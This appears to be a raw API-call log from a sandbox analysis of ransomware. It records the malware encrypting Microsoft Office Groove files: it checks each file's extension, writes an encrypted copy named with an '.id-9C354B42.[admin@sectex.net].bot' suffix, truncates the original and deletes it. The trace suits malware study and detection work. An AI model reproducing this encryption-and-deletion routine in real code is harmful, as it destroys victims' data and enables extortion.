	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".jpg") returned 4
	[0169.955] lstrcmpiW (lpString1=".jpg", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".doc") returned 4
	[0169.955] lstrcmpiW (lpString1=".doc", lpString2=".FDT") returned -1
	[0169.955] lstrlenW (lpString=".docx") returned 5
	[0169.955] lstrcmpiW (lpString1=".docx", lpString2="S.FDT") returned -1
	[0169.955] lstrlenW (lpString=".pdf") returned 4
	[0169.955] lstrcmpiW (lpString1=".pdf", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString=".xls") returned 4
	[0169.955] lstrcmpiW (lpString1=".xls", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString=".xlsx") returned 5
	[0169.955] lstrcmpiW (lpString1=".xlsx", lpString2="S.FDT") returned -1
	[0169.955] lstrlenW (lpString=".ppt") returned 4
	[0169.955] lstrcmpiW (lpString1=".ppt", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".zip") returned 4
	[0169.955] lstrcmpiW (lpString1=".zip", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString=".rar") returned 4
	[0169.955] lstrcmpiW (lpString1=".rar", lpString2=".FDT") returned 1
	[0169.955] lstrlenW (lpString=".bz2") returned 4
	[0169.955] lstrcmpiW (lpString1=".bz2", lpString2=".FDT") returned -1
	[0169.955] lstrlenW (lpString=".7z") returned 3
	[0169.955] lstrcmpiW (lpString1=".7z", lpString2="FDT") returned -1
	[0169.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.955] lstrlenW (lpString=".dbf") returned 4
	[0169.956] lstrcmpiW (lpString1=".dbf", lpString2=".FDT") returned -1
	[0169.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.956] lstrlenW (lpString=".1cd") returned 4
	[0169.956] lstrcmpiW (lpString1=".1cd", lpString2=".FDT") returned -1
	[0169.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\POLICIES.FDT") returned 109
	[0169.956] lstrlenW (lpString=".jpg") returned 4
	[0169.956] lstrcmpiW (lpString1=".jpg", lpString2=".FDT") returned 1
	[0169.956] lstrcmpiW (lpString1=".fdt", lpString2=".bot") returned 1
	[0169.956] lstrlenW (lpString="Process Library.fdt") returned 19
	[0169.956] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.956] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=92979) returned 1
	[0169.957] CloseHandle (hObject=0x3a4) returned 1
	[0169.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt")) returned 0x20
	[0169.957] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0169.957] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.957] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.958] GetLastError () returned 0x0
	[0169.958] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x16b33, lpOverlapped=0x0) returned 1
	[0169.996] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x16b40, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x16b40, lpOverlapped=0x0) returned 1
	[0169.998] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.998] WriteFile (in: hFile=0x118, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0169.998] SetEndOfFile (hFile=0x118) returned 1
	[0169.998] CloseHandle (hObject=0x118) returned 1
	[0169.998] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.998] SetEndOfFile (hFile=0x3a4) returned 1
	[0170.002] CloseHandle (hObject=0x3a4) returned 1
	[0170.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.002] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt")) returned 1
	[0170.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.004] lstrlenW (lpString=".doc") returned 4
	[0170.004] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.004] lstrlenW (lpString=".docx") returned 5
	[0170.004] lstrcmpiW (lpString1=".docx", lpString2="y.fdt") returned -1
	[0170.004] lstrlenW (lpString=".pdf") returned 4
	[0170.004] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.004] lstrlenW (lpString=".xls") returned 4
	[0170.004] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.004] lstrlenW (lpString=".xlsx") returned 5
	[0170.004] lstrcmpiW (lpString1=".xlsx", lpString2="y.fdt") returned -1
	[0170.004] lstrlenW (lpString=".ppt") returned 4
	[0170.004] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.004] lstrlenW (lpString=".zip") returned 4
	[0170.004] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.004] lstrlenW (lpString=".rar") returned 4
	[0170.005] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString=".bz2") returned 4
	[0170.005] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.005] lstrlenW (lpString=".7z") returned 3
	[0170.005] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString=".dbf") returned 4
	[0170.005] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString=".1cd") returned 4
	[0170.005] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString=".jpg") returned 4
	[0170.005] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString=".doc") returned 4
	[0170.005] lstrcmpiW (lpString1=".doc", lpString2=".fdt") returned -1
	[0170.005] lstrlenW (lpString=".docx") returned 5
	[0170.005] lstrcmpiW (lpString1=".docx", lpString2="y.fdt") returned -1
	[0170.005] lstrlenW (lpString=".pdf") returned 4
	[0170.005] lstrcmpiW (lpString1=".pdf", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString=".xls") returned 4
	[0170.005] lstrcmpiW (lpString1=".xls", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString=".xlsx") returned 5
	[0170.005] lstrcmpiW (lpString1=".xlsx", lpString2="y.fdt") returned -1
	[0170.005] lstrlenW (lpString=".ppt") returned 4
	[0170.005] lstrcmpiW (lpString1=".ppt", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.005] lstrlenW (lpString=".zip") returned 4
	[0170.005] lstrcmpiW (lpString1=".zip", lpString2=".fdt") returned 1
	[0170.005] lstrlenW (lpString=".rar") returned 4
	[0170.006] lstrcmpiW (lpString1=".rar", lpString2=".fdt") returned 1
	[0170.006] lstrlenW (lpString=".bz2") returned 4
	[0170.006] lstrcmpiW (lpString1=".bz2", lpString2=".fdt") returned -1
	[0170.006] lstrlenW (lpString=".7z") returned 3
	[0170.006] lstrcmpiW (lpString1=".7z", lpString2="fdt") returned -1
	[0170.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.006] lstrlenW (lpString=".dbf") returned 4
	[0170.006] lstrcmpiW (lpString1=".dbf", lpString2=".fdt") returned -1
	[0170.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.006] lstrlenW (lpString=".1cd") returned 4
	[0170.006] lstrcmpiW (lpString1=".1cd", lpString2=".fdt") returned -1
	[0170.006] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt") returned 116
	[0170.006] lstrlenW (lpString=".jpg") returned 4
	[0170.006] lstrcmpiW (lpString1=".jpg", lpString2=".fdt") returned 1
	[0170.006] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0170.006] lstrlenW (lpString="VIEW.ICO") returned 8
	[0170.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0170.401] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=318) returned 1
	[0170.401] CloseHandle (hObject=0x17c) returned 1
	[0170.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico")) returned 0x20
	[0170.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0170.401] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.401] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0170.710] GetLastError () returned 0x0
	[0170.710] ReadFile (in: hFile=0x17c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x13e, lpOverlapped=0x0) returned 1
	[0170.711] WriteFile (in: hFile=0x3f0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x140, lpOverlapped=0x0) returned 1
	[0170.712] ReadFile (in: hFile=0x17c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.712] WriteFile (in: hFile=0x3f0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0170.712] SetEndOfFile (hFile=0x3f0) returned 1
	[0170.992] CloseHandle (hObject=0x3f0) returned 1
	[0170.992] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.993] SetEndOfFile (hFile=0x17c) returned 1
	[0170.995] CloseHandle (hObject=0x17c) returned 1
	[0170.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico")) returned 1
	[0171.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.001] lstrlenW (lpString=".doc") returned 4
	[0171.001] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.001] lstrlenW (lpString=".docx") returned 5
	[0171.001] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0171.001] lstrlenW (lpString=".pdf") returned 4
	[0171.001] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.001] lstrlenW (lpString=".xls") returned 4
	[0171.001] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.001] lstrlenW (lpString=".xlsx") returned 5
	[0171.001] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0171.001] lstrlenW (lpString=".ppt") returned 4
	[0171.001] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.001] lstrlenW (lpString=".zip") returned 4
	[0171.001] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.001] lstrlenW (lpString=".rar") returned 4
	[0171.001] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.001] lstrlenW (lpString=".bz2") returned 4
	[0171.001] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.001] lstrlenW (lpString=".7z") returned 3
	[0171.001] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".dbf") returned 4
	[0171.002] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".1cd") returned 4
	[0171.002] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".jpg") returned 4
	[0171.002] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".doc") returned 4
	[0171.002] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.002] lstrlenW (lpString=".docx") returned 5
	[0171.002] lstrcmpiW (lpString1=".docx", lpString2="W.ICO") returned -1
	[0171.002] lstrlenW (lpString=".pdf") returned 4
	[0171.002] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString=".xls") returned 4
	[0171.002] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString=".xlsx") returned 5
	[0171.002] lstrcmpiW (lpString1=".xlsx", lpString2="W.ICO") returned -1
	[0171.002] lstrlenW (lpString=".ppt") returned 4
	[0171.002] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".zip") returned 4
	[0171.002] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString=".rar") returned 4
	[0171.002] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0171.002] lstrlenW (lpString=".bz2") returned 4
	[0171.002] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0171.002] lstrlenW (lpString=".7z") returned 3
	[0171.002] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0171.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.002] lstrlenW (lpString=".dbf") returned 4
	[0171.004] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0171.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.004] lstrlenW (lpString=".1cd") returned 4
	[0171.004] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0171.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO") returned 90
	[0171.004] lstrlenW (lpString=".jpg") returned 4
	[0171.004] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0171.004] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0171.004] lstrlenW (lpString="COMPUTER.ICO") returned 12
	[0171.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0171.006] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2606) returned 1
	[0171.006] CloseHandle (hObject=0x17c) returned 1
	[0171.006] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico")) returned 0x20
	[0171.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.062] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.062] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.063] GetLastError () returned 0x0
	[0171.063] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xa2e, lpOverlapped=0x0) returned 1
	[0171.098] WriteFile (in: hFile=0x124, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xa30, lpOverlapped=0x0) returned 1
	[0171.099] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.099] WriteFile (in: hFile=0x124, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.099] SetEndOfFile (hFile=0x124) returned 1
	[0171.099] CloseHandle (hObject=0x124) returned 1
	[0171.099] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.100] SetEndOfFile (hFile=0x354) returned 1
	[0171.102] CloseHandle (hObject=0x354) returned 1
	[0171.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\computer.ico")) returned 1
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\COMPUTER.ICO") returned 72
	[0171.103] lstrlenW (lpString=".doc") returned 4
	[0171.103] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0171.103] lstrlenW (lpString=".docx") returned 5
	[0171.103] lstrcmpiW (lpString1=".docx", lpString2="R.ICO") returned -1
